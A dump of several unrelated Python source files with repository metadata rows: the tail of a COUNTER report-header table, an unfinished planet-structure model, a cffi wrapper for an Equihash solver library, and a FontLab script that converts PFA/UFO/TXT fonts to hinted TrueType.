u'Journal DOI',
u'Proprietary Identifier',
u'Print ISSN',
u'Online ISSN',
u'Reporting Period Total',
u'Reporting Period HTML',
u'Reporting Period PDF',
),
"BR1": (
u'',
u'Publisher',
u'Platform',
u'Book DOI',
u'Proprietary Identifier',
u'ISBN',
u'ISSN',
u'Reporting Period Total',
),
"BR2": (
u'',
u'Publisher',
u'Platform',
u'Book DOI',
u'Proprietary Identifier',
u'ISBN',
u'ISSN',
u'Reporting Period Total',
),
"BR3": (
u'',
u'Publisher',
u'Platform',
u'Book DOI',
u'Proprietary Identifier',
u'ISBN',
u'ISSN',
u'Reporting Period Total',
),
"DB1": (
u'Database',
u'Publisher',
u'Platform',
u'User Activity',
u'Reporting Period Total',
),
"DB2": (
u'Database',
u'Publisher',
u'Platform',
u'Access denied category',
u'Reporting Period Total',
),
}
TOTAL_TEXT = {
'JR1': u'Total for all journals',
'BR1': u'Total for all titles',
'BR2': u'Total for all titles',
'DB2': u'Total for all databases',
}
| mit | -3,423,670,937,387,437,600 | 32.754098 | 79 | 0.583293 | false |
smwahl/PlLayer | outline.py | 1 | 8657 | import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import matplotlib
from copy import deepcopy
class planet(object):
    ''' Represents a snapshot of an evolving planet, with methods
    for comparing different snapshots and relating thermal evolution to
    time.'''
def __init__(self, params=None, pcopy=None):
''' Create planet snapshot, either with new parameters or with
another planet object.'''
self.layers = []
self.boundaries = []
self.mass = None
self.radius = None
# tracks whether structure (radii,T-profiles) have been calculated since modifications were made
self.structured = False
        if pcopy is not None:
self.layers = deepcopy(pcopy.layers)
self.boundaries = deepcopy(pcopy.boundaries)
self.mass = deepcopy(pcopy.mass)
            self.radius = deepcopy(pcopy.radius)
def setLayers(self,layers):
''' Define the layers to be included in the planet snapshot.
        Note: information not copied'''
        self.layers = layers
        # add boundaries consistent with the layers
self.boundaries = []
for layer in layers:
lbounds = layer.boundaries
self.boundaries += [ lb for lb in lbounds if lb not in self.boundaries ]
def setBoundaries(self,boundaries):
        ''' Define the boundaries to be included in the planet snapshot.
        Note: Information not copied'''
        self.boundaries = boundaries
        # add layers consistent with the boundaries
self.layers = []
for bound in boundaries:
blayers = bound.layers
self.layers += [ bl for bl in blayers if bl not in self.layers ]
# Following functions will probably be feature of the more specific model,
# might want to add placeholder functions, however.
# def stepT(dT,boundary):
# ''' Simulated timestep in which a boundaries lower temperature is
# changed by dT'''
# def QtoTime(self,dQ):
# ''' Placeholder, should be defined by specific model '''
# def diff(comp_snapshot):
# ''' Compare energy and entropy budgets of various layers. Relates the
# difference to a heat flow for one snapshot to evolve into the previous one.'''
# def structure(T,boundary):
# ''' Integrate Strucuture, specifing the temperature at a boundary '''
    def budgets(self):
''' Report integrated energy and entropy budgets for layers in the planet'''
pass
class xlznCorePlanet(planet):
    ''' Represents the particular situation of a crystallizing metallic core with a
    simple model for mantle evolution.'''
def __init__(self,planet_file=None,pcopy=None):
''' Initizialize xlznCorePlanet object. Will eventually want to take input
file names as arguments.'''
if not pcopy is None:
self.mantle = deepcopy(pcopy.mantle)
self.core = deepcopy(pcopy.core)
self.layers = deepcopy(pcopy.layers)
self.boundaries = deepcopy(pcopy.boundaries)
self.surface = deepcopy(pcopy.surface)
self.cmb = deepcopy(pcopy.cmb)
self.icb = deepcopy(pcopy.icb)
self.center = deepcopy(pcopy.center)
self.mass = pcopy.mass
self.radius = pcopy.radius
self.mantle_density = pcopy.mantle_density
self.core_mass = pcopy.core_mass
self.structured = pcopy.structured
return None
# Define materials from text files
        rock = Material('simpleSilicateMantle.txt')
        liqFeS = Material('binaryFeS.txt', mtype='liquid')
        solFe = Material('simpleSolidIron.txt')
# Define melting/solidifcation relationships under consideration
liqFeS.interpLiquidus('FeS',solFe)
self.mantle = layer('mantle',material=rock)
self.core = xlznLayer('core', material=liqFeS, layernames=['outer_core','inner_core'],
boundnames=['icb'])
        # set list of layers (self.core.layers should initially return a single liquid layer)
self.layers = [self.mantle] + self.core.layers
# set list of boundaries
self.boundaries = GenerateBoundaries(self.layers,['surface','cmb','center'])
        self.surface, self.cmb, self.center = self.boundaries[0], self.boundaries[1], self.boundaries[-1]
self.icb = None # indicates icb has yet to form
# read in parameters from file and decide whether this is new planet or a continuation
# at a different condition
try:
params = parseParamFile(open(planet_file,'r'))
except:
raise Exception('File not found: {}'.format(planet_file))
try:
            self.mass = params.Mplanet
            self.radius = params.Rplanet
            core_radius = params.Rcore
            self.cmb.r = core_radius
            self.surface.r = self.radius
            self.mantle_density = None
            self.core_mass = None
            self.center.P = params.P0
self.cmb.T = params.Tcmb
smode = 'initial'
except:
try:
self.mass = params.Mplanet
self.mantle_density = params.rhomantle
self.core_mass = params.Mcore
self.core.M = core_mass
                self.center.P = params.P0
self.cmb.T = params.Tcmb
self.radius = None
smode = 'cont'
except:
raise Exception('Invalid input file.')
        # Integrate structure (making the entire structure consistent with starting values)
success = self.structure(mode=smode)
# should check to make sure the integration succeeded
if success:
self.radius = self.surface.r
#self.mantle_density =
            self.core_mass = self.core.M
            self.structured = True
Mplanet = self.mass
Mcore = self.core_mass
rhomantle = self.mantle_density
            P0 = self.center.P
            params = [Mplanet, Mcore, rhomantle, P0]
# write new parameter file to run a planet with consistent mass and mantle density
writeParamFile(open('./xlzncoreplanet_cont.txt','w'),params)
return None
        else:
            raise Exception('Structure integration failed.')
class layer(object):
''' A layer is a portion of a planet with an adiabatic temperature profile,
composed of a single material '''
def __init__(self,name='',mass=None,material=None,comp=None):
self.name = name
self.boundaries = None
self.mass = mass
self.material = material
self.comp = comp
    def specEnergy(self):
pass
class liquidLayer(layer):
''' A liquid layer has a specific entropy which can be related to viscous and/or
ohmic dissipation.'''
    def specEntropy(self):
pass
class xlznLayer(object):
    ''' Defines a layer of liquid material that is free to crystallize upon cooling.
    Contains a list of solids, each with a corresponding liquidus. There are
    three possible occurrences when the adiabat intersects a liquidus:
    1) solid more dense and adiabat remains below liquidus to the bottom of the
    layer, forming a settled region at the bottom.
    2) Identical case with a less dense solid settling to the top.
    3) 'Snow' regime, where sinking/floating crystals would remelt before settling.
    For 1) and 2) a separate solid layer is formed. For 3) the liquid adiabat
    is instead constrained to follow the liquidus.'''
    def __init__(self, name='', material=None, layernames=None, boundnames=None):
        # Signature inferred from the call site in xlznCorePlanet.__init__.
        self.name = name
        self.liquid = material
        self.solids = []
        self.comp = None  # Mass ratio of different components
        self.mass = None
        self.liquidi = []  # a liquidus corresponding to each solid phase
        self.adiabat = None  # a modified adiabat, following the liquidus in a 'snow' region
        self.layernames = layernames
        self.boundnames = boundnames
        self.layers = []  # sub-layers; initially a single liquid layer is expected
class boundary(object):
    def __init__(self, name=''):
        self.name = name
        self.T = None  # upper and lower temperature
        self.d = None  # depth of the boundary
        self.r = None  # radius, set during structure integration
        self.P = None  # pressure at the boundary
        self.layers = []  # layers adjoining this boundary
    def calcEnergy(self):
        pass
    def calcEntropy(self):
        pass
class Material(object):
    '''Class for keeping track of various physical properties of a material and how
    these vary as a function of P, T and composition.'''
    def __init__(self, param_file=None, mtype=None):
        self.mtype = mtype
        self.liquidus = None
        self.components = None
        self.td_params = None  # holds functions for returning thermodynamic parameters
        if param_file is not None:
            self.set_td_params(param_file)
    def interpLiquidus(self, component, solid):
        # named to match the call site liqFeS.interpLiquidus('FeS', solFe)
        pass
    def set_td_params(self, param_file):
        pass
def shellIntegral(funcs, r0=0., r1=1., tols=None, limits=None):
    ''' Integrate an arbitrary number of functions over a spherical shell
    from r0 to r1. '''
    pass
| mit | -6,883,647,413,842,892,000 | 32.296154 | 104 | 0.621116 | false |
slush0/epycyzm | morpavsolver/__init__.py | 1 | 3468 | # https://github.com/morpav/zceq_solver--bin
from cffi import FFI
import os.path
import inspect
ffi = None
library = None
library_header = """
typedef struct {
char data[1344];
} Solution;
typedef struct {
unsigned int data[512];
} ExpandedSolution;
typedef struct HeaderAndNonce {
char data[140];
} HeaderAndNonce;
typedef struct ZcEquihashSolverT ZcEquihashSolver;
ZcEquihashSolver* CreateSolver(void);
void DestroySolver(ZcEquihashSolver* solver);
int FindSolutions(ZcEquihashSolver* solver, HeaderAndNonce* inputs,
Solution solutions[], int max_solutions);
int ValidateSolution(ZcEquihashSolver* solver, HeaderAndNonce* inputs, Solution* solutions);
void RunBenchmark(long long nonce_start, int iterations);
bool ExpandedToMinimal(Solution* minimal, ExpandedSolution* expanded);
bool MinimalToExpanded(ExpandedSolution* expanded, Solution* minimal);
"""
def load_library(path=None):
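    """Load the solver shared library through cffi; defaults to
    morpavsolver.so located next to this file."""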
global library, ffi
assert library is None
ffi = FFI()
ffi.cdef(library_header)
if path is None:
path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'morpavsolver.so')
library = ffi.dlopen(path)
assert library is not None
class Solver:
def __init__(self):
self.solver_ = self.header_ = self.solutions_ = self.solution_to_check_ = None
self._ensure_library()
assert library and ffi
self.solver_ = library.CreateSolver()
self.header_ = ffi.new("HeaderAndNonce*")
self.solutions_ = ffi.new("Solution[16]")
self.solution_to_check_ = ffi.new("Solution*")
self.expanded_tmp_ = ffi.new("ExpandedSolution*")
def __del__(self):
# Free the underlying resources on destruction
        library.DestroySolver(self.solver_)
self.solver_ = None
# cffi's cdata are collected automatically
self.header_ = self.solutions_ = self.solution_to_check_ = None
def _ensure_library(self):
        # Try to load the library from the standard location
if (library is None):
load_library()
def run_benchmark(self, iterations=10, nonce_start=0):
library.RunBenchmark(nonce_start, iterations)
def find_solutions(self, block_header):
assert len(block_header) == 140
self.header_.data = block_header
        return library.FindSolutions(self.solver_, self.header_, self.solutions_, 16)
def get_solution(self, num):
        assert 0 <= num < 16
return bytes(ffi.buffer(self.solutions_[num].data))
    def validate_solution(self, block_header, solution):
        assert len(block_header) == 140
        assert len(solution) == 1344
        # Copy the header in too; the original only copied the solution, so
        # validation silently reused whatever header was set last.
        self.header_.data = block_header
        self.solution_to_check_.data = solution
        return library.ValidateSolution(self.solver_, self.header_, self.solution_to_check_)
    def list_to_minimal(self, expanded):
        # Allocate unconditionally; the original only created this inside the
        # branch below, raising NameError for a cdata ExpandedSolution input.
        minimal = ffi.new("Solution*")
        if isinstance(expanded, (list, tuple)):
            assert len(expanded) == 512
            tmp = self.expanded_tmp_
            for i, idx in enumerate(expanded):
                tmp.data[i] = idx
            expanded = tmp
        res = library.ExpandedToMinimal(minimal, expanded)
        assert res
        return minimal
def minimal_to_list(self, minimal):
tmp = self.expanded_tmp_
res = library.MinimalToExpanded(tmp, minimal)
assert res
result = [tmp.data[i] for i in range(512)]
return result
__all__ = ['Solver', 'load_library']
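# Minimal usage sketch (illustrative addition, not part of the original
# module). It assumes morpavsolver.so is present next to this file and that a
# non-zero return from validate_solution() means "valid"; the all-zero header
# below will normally yield no solutions.
if __name__ == '__main__':
    solver = Solver()
    header = b'\x00' * 140  # placeholder 140-byte header+nonce
    found = solver.find_solutions(header)
    print('%d solution(s) found' % found)
    for i in range(found):
        minimal = solver.get_solution(i)
        assert solver.validate_solution(header, minimal)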
| mit | 957,639,449,207,624,700 | 28.896552 | 93 | 0.654268 | false |
adobe-type-tools/fontlab-scripts | TrueType/convertToTTF.py | 1 | 28980 | #FLM: Convert PFA/UFO/TXT to TTF/VFB
# coding: utf-8
__copyright__ = __license__ = """
Copyright (c) 2015-2016 Adobe Systems Incorporated. All rights reserved.
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
__doc__ = """
Convert PFA/UFO/TXT to TTF/VFB
This FontLab script will convert one or more hinted PFA/UFO or TXT files
into TTF files, for use as input for makeOTF.
The script will first ask for a directory, which usually should be the
family's top-most folder. It will then crawl through that folder and
process all input files it finds. In addition to the directory, the script
will also ask for an encoding file. This encoding file is a FontLab '.enc'
file which the script will use for ordering the glyphs.
Note:
This script imports the `Input TrueType Hints` script, therefore needs to be
run from the same folder.
==================================================
Versions:
v1.7 - Jun 17 2016 - Skip 'prep' table processing if the font doesn't have it.
v1.6 - Apr 25 2016 - Replace ttx commands by fontTools operations.
v1.5 - Jul 17 2015 - Turn off the addition of NULL and CR glyphs.
v1.4 - Apr 17 2015 - Support changes made to inputTTHints module.
v1.3 - Apr 02 2015 - Now also works properly on FL Windows.
v1.2 - Mar 26 2015 - Move code reading external `tthints` file to an adjacent
module.
v1.1 - Mar 23 2015 - Allow instructions in x-direction.
v1.0 - Mar 04 2015 - Initial public release (Robothon 2015).
"""
import os
import re
import sys
import time
from FL import *
import fl_cmd
try:
    import dvInput_module
    dvModuleFound = True
except ImportError:
    dvModuleFound = False
fl.output = ''
errorHappened = False
# ----------------------------------------------------------------------------------------
# Find and import inputTTHints module:
def findFile(fileName, path):
'Find file of given fileName, starting at path.'
for root, dirs, files in os.walk(path):
if fileName in files:
return os.path.join(root)
else:
return None
moduleName = 'inputTTHints.py'
userFolder = os.path.expanduser('~')
customModulePathMAC = os.sep.join((
userFolder, 'Library', 'Application Support',
'FontLab', 'Studio 5', 'Macros'))
customModulePathPC = os.sep.join((
userFolder, 'Documents', 'FontLab', 'Studio5', 'Macros'))
possibleModulePaths = [fl.userpath, customModulePathMAC, customModulePathPC]
print '\nLooking for %s ... ' % (moduleName)
for path in possibleModulePaths:
modPath = findFile(moduleName, path)
if modPath:
print 'found at %s' % modPath
break
if not modPath:
# Module was not found. World ends.
errorHappened = True
print 'Not found in the following folders:\n%s\n\
Please make sure the possibleModulePaths list in this script \
points to a folder containing %s' % ('\n'.join(possibleModulePaths), moduleName)
else:
# Module was found, import it.
if modPath not in sys.path:
sys.path.append(modPath)
import inputTTHints
# ----------------------------------------------------------------------------------------
MAC = False
PC = False
if sys.platform in ('mac', 'darwin'):
MAC = True
elif os.name == 'nt':
PC = True
# Add the FDK path to the env variable (on Mac only) so
# that command line tools can be called from FontLab
if MAC:
fdkPathMac = os.sep.join((
userFolder, 'bin', 'FDK', 'tools', 'osx'))
envPath = os.environ["PATH"]
newPathString = envPath + ":" + fdkPathMac
if fdkPathMac not in envPath:
os.environ["PATH"] = newPathString
if PC:
from subprocess import Popen, PIPE
# ----------------------------------------------------------------------------------------
# Import the FDK-embedded fontTools
if MAC:
osFolderName = "osx"
if PC:
osFolderName = "win"
fontToolsPath = os.sep.join((
userFolder, 'bin', 'FDK', 'Tools',
osFolderName, 'Python', 'AFDKOPython27', 'lib',
'python2.7', 'site-packages', 'FontTools'))
if fontToolsPath not in sys.path:
sys.path.append(fontToolsPath)
try:
from fontTools import ttLib
except ImportError:
print "\nERROR: FontTools Python module is not installed.\nGet the latest version at https://github.com/behdad/fonttools"
errorHappened = True
# ----------------------------------------------------------------------------------------
# constants:
kPPMsFileName = "ppms"
kTTHintsFileName = "tthints"
kGOADBfileName = "GlyphOrderAndAliasDB"
kTempEncFileName = ".tempEncoding"
kFontTXT = "font.txt"
kFontUFO = "font.ufo"
kFontTTF = "font.ttf"
flPrefs = Options()
flPrefs.Load()
def readFile(filePath):
file = open(filePath, 'r')
fileContent = file.read().splitlines()
file.close()
return fileContent
def writeFile(contentList, filePath):
outfile = open(filePath, 'w')
outfile.writelines(contentList)
outfile.close()
def getFontPaths(path):
fontsList = []
for root, folders, files in os.walk(path):
fileAndFolderList = folders[:]
fileAndFolderList.extend(files)
pfaRE = re.compile(r'(^.+?\.pfa)$', re.IGNORECASE)
ufoRE = re.compile(r'(^.+?\.ufo)$', re.IGNORECASE)
txtRE = re.compile(r'^font.txt$', re.IGNORECASE)
pfaFiles = [
match.group(1) for item in fileAndFolderList
for match in [pfaRE.match(item)] if match]
ufoFiles = [
match.group(1) for item in fileAndFolderList
for match in [ufoRE.match(item)] if match]
txtFiles = [
match.group(0) for item in fileAndFolderList
for match in [txtRE.match(item)] if match]
# Prioritizing the list of source files, so that only one of them is
# found and converted; in case there are multiple possible files in
# a single folder. Order of priority is PFA - UFO - TXT.
allFontsFound = pfaFiles + ufoFiles + txtFiles
if len(allFontsFound):
item = allFontsFound[0]
fontsList.append(os.path.join(root, item))
else:
continue
return fontsList
def getGOADB2ndColumn(goadbList):
'Get the second column of the original GOADB file and return it as a list.'
resultList = []
lineNum = 1
skippedLines = 0
re_match1stCol = re.compile(r"(\S+)\t(\S+)(\t\S+)?")
for line in goadbList:
# allow for comments:
line = line.split('#')[0]
# Skip over blank lines
stripline = line.strip()
if not stripline:
skippedLines += 1
continue
result = re_match1stCol.match(line)
if result: # the result can be None
resultList.append(result.group(2) + '\n')
else: # nothing matched
print "Problem matching line %d (current GOADB)" % lineNum
lineNum += 1
if (len(goadbList) != (len(resultList) + skippedLines)):
print "ERROR: There was a problem processing the current GOADB file"
return None
else:
return resultList
def makeTempEncFileFromGOADB(goadbPath):
goadbFileContent = readFile(goadbPath)
goadb2ndColumnList = getGOADB2ndColumn(goadbFileContent)
if not goadb2ndColumnList:
return None
encPath = os.path.join(os.path.dirname(goadbPath), kTempEncFileName)
writeFile(goadb2ndColumnList, encPath)
return encPath
def readPPMsFile(filePath):
lines = readFile(filePath)
hPPMsList = []
vPPMsList = []
    for line in lines:
# Skip over blank lines
stripline = line.strip()
if not stripline:
continue
# Get rid of all comments
if line.find('#') >= 0:
continue
else:
if "X:" in line:
vPPMsList.append(line)
else:
hPPMsList.append(line)
return hPPMsList, vPPMsList
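# Expected layout of the 'ppms' file (an assumption inferred from the
# tab-separated unpacking in replaceStemsAndPPMs() below; the file itself is
# not part of this script). One stem record per line, vertical stems carrying
# an "X:" prefix in the name column:
#
#   Y:80<tab>80<tab>17<tab>23<tab>29<tab>35<tab>41
#   X:92<tab>92<tab>16<tab>22<tab>28<tab>34<tab>40
#
# i.e. name, width, then the ppm2..ppm6 pixel-per-em thresholds.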
def replaceStemsAndPPMs(hPPMsList, vPPMsList):
if len(hPPMsList) != len(fl.font.ttinfo.hstem_data):
print "\tERROR: The amount of H stems does not match"
return
if len(vPPMsList) != len(fl.font.ttinfo.vstem_data):
print "\tERROR: The amount of V stems does not match"
return
for i in range(len(fl.font.ttinfo.hstem_data)):
name, width, ppm2, ppm3, ppm4, ppm5, ppm6 = hPPMsList[i].split('\t')
stem = TTStem()
stem.name = name
stem.width = int(width)
stem.ppm2 = int(ppm2)
stem.ppm3 = int(ppm3)
stem.ppm4 = int(ppm4)
stem.ppm5 = int(ppm5)
stem.ppm6 = int(ppm6)
fl.font.ttinfo.hstem_data[i] = stem
for i in range(len(fl.font.ttinfo.vstem_data)):
name, width, ppm2, ppm3, ppm4, ppm5, ppm6 = vPPMsList[i].split('\t')
stem = TTStem()
stem.name = name
stem.width = int(width)
stem.ppm2 = int(ppm2)
stem.ppm3 = int(ppm3)
stem.ppm4 = int(ppm4)
stem.ppm5 = int(ppm5)
stem.ppm6 = int(ppm6)
fl.font.ttinfo.vstem_data[i] = stem
def processZonesArray(inArray):
outArray = []
for x in range(len(inArray)/2):
if inArray[x * 2] < 0:
outArray.append(inArray[x * 2])
outArray.append(inArray[x * 2 + 1])
outArray.sort()
return outArray
def removeBottomZonesAboveBaseline():
baselineZonesWereRemoved = False
# this is a single master font, so only the
# first array will have non-zero values:
newOtherBluesArray = processZonesArray(fl.font.other_blues[0])
if (fl.font.other_blues_num != len(newOtherBluesArray)):
# trim the number of zones
fl.font.other_blues_num = len(newOtherBluesArray)
for x in range(len(newOtherBluesArray)):
fl.font.other_blues[0][x] = newOtherBluesArray[x]
baselineZonesWereRemoved = True
newFamilyOtherBluesArray = processZonesArray(fl.font.family_other_blues[0])
if (fl.font.family_other_blues_num != len(newFamilyOtherBluesArray)):
# trim the number of zones
fl.font.family_other_blues_num = len(newFamilyOtherBluesArray)
for x in range(len(newFamilyOtherBluesArray)):
fl.font.family_other_blues[0][x] = newFamilyOtherBluesArray[x]
baselineZonesWereRemoved = True
return baselineZonesWereRemoved
def replaceFontZonesByFamilyZones():
"""
The font's zones are replaced by the family zones to make sure that all
the styles have the same vertical height at all ppems. If the font doesn't
have family zones (e.g. Regular style), don't do anything.
"""
fontZonesWereReplaced = False
# TOP zones
if len(fl.font.family_blues[0]):
if fl.font.family_blues_num == 14 and fl.font.blue_values_num < fl.font.family_blues_num:
print
print "### MAJOR ERROR ###: Due to a FontLab bug the font's TOP zones cannot be replaced by the family TOP zones"
print
return fontZonesWereReplaced
elif fl.font.family_blues_num == 14 and fl.font.blue_values_num == fl.font.family_blues_num:
pass
else:
fl.font.blue_values_num = fl.font.family_blues_num
# This will create a traceback if there are 7 top zones,
# therefore the IFs above.
# Replace the font's zones by the family zones
for x in range(len(fl.font.family_blues[0])):
fl.font.blue_values[0][x] = fl.font.family_blues[0][x]
print "WARNING: The font's TOP zones were replaced by the family TOP zones."
fontZonesWereReplaced = True
# BOTTOM zones
if len(fl.font.family_other_blues[0]):
if fl.font.family_other_blues_num == 10 and fl.font.other_blues_num < fl.font.family_other_blues_num:
print
print "### MAJOR ERROR ###: Due to a FontLab bug the font's BOTTOM zones cannot be replaced by the family BOTTOM zones"
print
return fontZonesWereReplaced
elif fl.font.family_other_blues_num == 10 and fl.font.other_blues_num == fl.font.family_other_blues_num:
pass
else:
fl.font.other_blues_num = fl.font.family_other_blues_num
# This will create a traceback if there are 5 bottom zones,
# therefore the IFs above.
# Replace the font's zones by the family zones
for x in range(len(fl.font.family_other_blues[0])):
fl.font.other_blues[0][x] = fl.font.family_other_blues[0][x]
print "WARNING: The font's BOTTOM zones were replaced by the family BOTTOM zones."
fontZonesWereReplaced = True
return fontZonesWereReplaced
def convertT1toTT():
'''
Converts an open FL font object from PS to TT outlines, using on-board
FontLab commands. The outlines are post-processed to reset starting points
to their original position.
'''
for g in fl.font.glyphs:
# Keeping track of original start point coordinates:
startPointCoords = [
(point.x, point.y) for point in g.nodes if point.type == 17]
# fl.TransformGlyph(g, 5, "0001") # Remove Horizontal Hints
# fl.TransformGlyph(g, 5, "0003") # Remove Horizontal & Vertical Hints
fl.TransformGlyph(g, 5, "0002") # Remove Vertical Hints
fl.TransformGlyph(g, 13, "") # Curves to TrueType
fl.TransformGlyph(g, 14, "0001") # Contour direction [TT]
# The start points might move when FL reverses the contour.
# This dictionary keeps track of the new coordinates.
newCoordDict = {
(node.x, node.y): index for index, node in enumerate(g.nodes)}
# Going through all start points backwards, and re-setting them
# to original position.
for pointCoords in startPointCoords[::-1]:
g.SetStartNode(newCoordDict[pointCoords])
fl.TransformGlyph(g, 7, "") # Convert PS hints to TT instructions.
def changeTTfontSettings():
# Clear `gasp` array:
if len(fl.font.ttinfo.gasp):
del fl.font.ttinfo.gasp[0]
# Create `gasp` element:
gaspElement = TTGasp(65535, 2)
# Range: 65535=0...
# Options: 0=None
# 1=Instructions
# 2=Smoothing
# 3=Instructions+Smoothing
# Add element to `gasp` array
fl.font.ttinfo.gasp[0] = gaspElement
# Clear `hdmx` array
for i in range(len(fl.font.ttinfo.hdmx)):
try:
del fl.font.ttinfo.hdmx[0]
        except Exception:
continue
# Uncheck "Create [vdmx] table", also
# uncheck "Automatically add .null, CR and space characters"
fl.font.ttinfo.head_flags = 0
def setType1openPrefs():
flPrefs.T1Decompose = 1 # checked - Decompose all composite glyphs
flPrefs.T1Unicode = 0 # unchecked - Generate Unicode indexes for all glyphs
flPrefs.OTGenerate = 0 # unchecked - Generate basic OpenType features for Type 1 fonts with Standard encoding
flPrefs.T1MatchEncoding = 0 # unchecked - Find matching encoding table if possible
def setTTgeneratePrefs():
flPrefs.TTENoReorder = 1 # unchecked - Automatically reorder glyphs
flPrefs.TTEFontNames = 1 # option - Do not export OpenType name records
flPrefs.TTESmartMacNames = 0 # unchecked - Use the OpenType names as menu names on Macintosh
flPrefs.TTEStoreTables = 0 # unchecked - Write stored custom TrueType/OpenType tables
flPrefs.TTEExportOT = 0 # unchecked - Export OpenType layout tables
flPrefs.DSIG_Use = 0 # unchecked - Generate digital signature (DSIG table)
flPrefs.TTEHint = 1 # checked - Export hinted TrueType fonts
flPrefs.TTEKeep = 1 # checked - Write stored TrueType native hinting
flPrefs.TTEVisual = 1 # checked - Export visual TrueType hints
flPrefs.TTEAutohint = 0 # unchecked - Autohint unhinted glyphs
flPrefs.TTEWriteBitmaps = 0 # unchecked - Export embedded bitmaps
flPrefs.CopyHDMXData = 0 # unchecked - Copy HDMX data from base to composite glyph
flPrefs.OTWriteMort = 0 # unchecked - Export "mort" table if possible
flPrefs.TTEVersionOS2 = 3 # option - OS/2 table version 3
flPrefs.TTEWriteKernTable = 0 # unchecked - Export old-style non-OpenType "kern" table
flPrefs.TTEWriteKernFeature = 0 # unchecked - Generate OpenType "kern" feature if it is undefined or outdated
flPrefs.TTECmap10 = 1 # option - Use following codepage to build cmap(1,0) table:
# [Current codepage in the Font Window]
flPrefs.TTEExportUnicode = 0 # checked - Ignore Unicode indexes in the font
# option - Use following codepage for first 256 glyphs:
# Do not reencode first 256 glyphs
# unchecked - Export only first 256 glyphs of the selected codepage
# unchecked - Put MS Char Set value into fsSelection field
def setTTautohintPrefs():
# The single link attachment precision is 7 in all cases
# flPrefs.TTHHintingOptions = 16135 # All options checked
# flPrefs.TTHHintingOptions = 7 # All options unchecked
flPrefs.TTHHintingOptions = 2055 # Cusps option checked
def postProcessTTF(fontFilePath):
'''
Post-process TTF font as generated by FontLab:
- change FontLab-generated glyph name 'nonmarkingspace' to 'nbspace'
- edit `prep` table to stop hints being active at 96 ppm and above.
'''
print "Post-processing font.ttf file..."
font = ttLib.TTFont(fontFilePath)
glyphOrder = font.getGlyphOrder()
postTable = font['post']
if 'prep' in font.keys():
prepTable = font['prep']
else:
prepTable = None
glyfTable = font['glyf']
hmtxTable = font['hmtx']
# Change name of 'nonbreakingspace' to 'nbspace' in GlyphOrder
# and glyf table and add it to post table
if "nonbreakingspace" in glyphOrder:
# updateGlyphOrder = True
glyphOrder[glyphOrder.index("nonbreakingspace")] = "nbspace"
font.setGlyphOrder(glyphOrder)
glyfTable.glyphs["nbspace"] = glyfTable.glyphs["nonbreakingspace"]
del glyfTable.glyphs["nonbreakingspace"]
hmtxTable.metrics["nbspace"] = hmtxTable.metrics["nonbreakingspace"]
del hmtxTable.metrics["nonbreakingspace"]
postTable.extraNames.append("nbspace")
# Delete NULL and CR
for gName in ["NULL", "nonmarkingreturn"]:
if gName in glyphOrder:
del glyphOrder[glyphOrder.index(gName)]
font.setGlyphOrder(glyphOrder)
del glyfTable.glyphs[gName]
del hmtxTable.metrics[gName]
if gName in postTable.extraNames:
del postTable.extraNames[postTable.extraNames.index(gName)]
# Extend the prep table
# If the last byte is
# WCVTP[ ] /* WriteCVTInPixels */
# add these extra bytes
# MPPEM[ ] /* MeasurePixelPerEm */
# PUSHW[ ] /* 1 value pushed */
# 96
# GT[ ] /* GreaterThan */
# IF[ ] /* If */
# PUSHB[ ] /* 1 value pushed */
# 1
# ELSE[ ] /* Else */
# PUSHB[ ] /* 1 value pushed */
# 0
# EIF[ ] /* EndIf */
# PUSHB[ ] /* 1 value pushed */
# 1
# INSTCTRL[ ] /* SetInstrExecControl */
if prepTable:
if prepTable.program.bytecode[-1] == 68:
prepTable.program.bytecode.extend(
[75, 184, 0, 96, 82, 88, 176, 1, 27, 176, 0, 89, 176, 1, 142])
# Save the changes
folderPath, fontFileName = os.path.split(fontFilePath)
newFontFilePath = os.path.join(folderPath, "%s%s" % ('_', fontFileName))
font.save(newFontFilePath)
font.close()
os.remove(fontFilePath)
os.rename(newFontFilePath, fontFilePath)
def convertTXTfontToPFA(txtPath):
tempPFApath = txtPath.replace('.txt', '_TEMP_.pfa')
command = 'type1 "%s" > "%s"' % (txtPath, tempPFApath)
# Run type1 tool
if MAC:
pp = os.popen(command)
# report = pp.read()
pp.close()
if PC:
pp = Popen(command, shell=True, stdout=PIPE, stderr=PIPE)
out, err = pp.communicate()
if err:
print out, err
return tempPFApath
def convertUFOfontToPFA(ufoPath):
tempPFApath = ufoPath.replace('.ufo', '_TEMP_.pfa')
command = 'tx -t1 "%s" > "%s"' % (ufoPath, tempPFApath)
# Run tx tool
if MAC:
pp = os.popen(command)
# report = pp.read()
pp.close()
if PC:
pp = Popen(command, shell=True, stdout=PIPE, stderr=PIPE)
out, err = pp.communicate()
if err:
print out, err
return tempPFApath
def processFonts(fontsList):
totalFonts = len(fontsList)
print "%d fonts found:\n%s\n" % (totalFonts, '\n'.join(fontsList))
setType1openPrefs()
setTTgeneratePrefs()
setTTautohintPrefs()
fontIndex = 1
for pfaPath in fontsList:
# Make temporary encoding file from GOADB file. This step needs to
# be done per font, because the directory tree selected may contain
# more than one family, or because the glyph set of a given family
# may not be the same for both Roman/Upright and Italic/Sloped.
encPath = None
goadbPath = None
# The GOADB can be located in the same folder or up to two
# levels above in the directory tree
sameLevel = os.path.join(os.path.dirname(pfaPath), kGOADBfileName)
oneUp = os.path.join(
os.path.dirname(os.path.dirname(pfaPath)), kGOADBfileName)
twoUp = os.path.join(
os.path.dirname(os.path.dirname(os.path.dirname(pfaPath))), kGOADBfileName)
if os.path.exists(sameLevel):
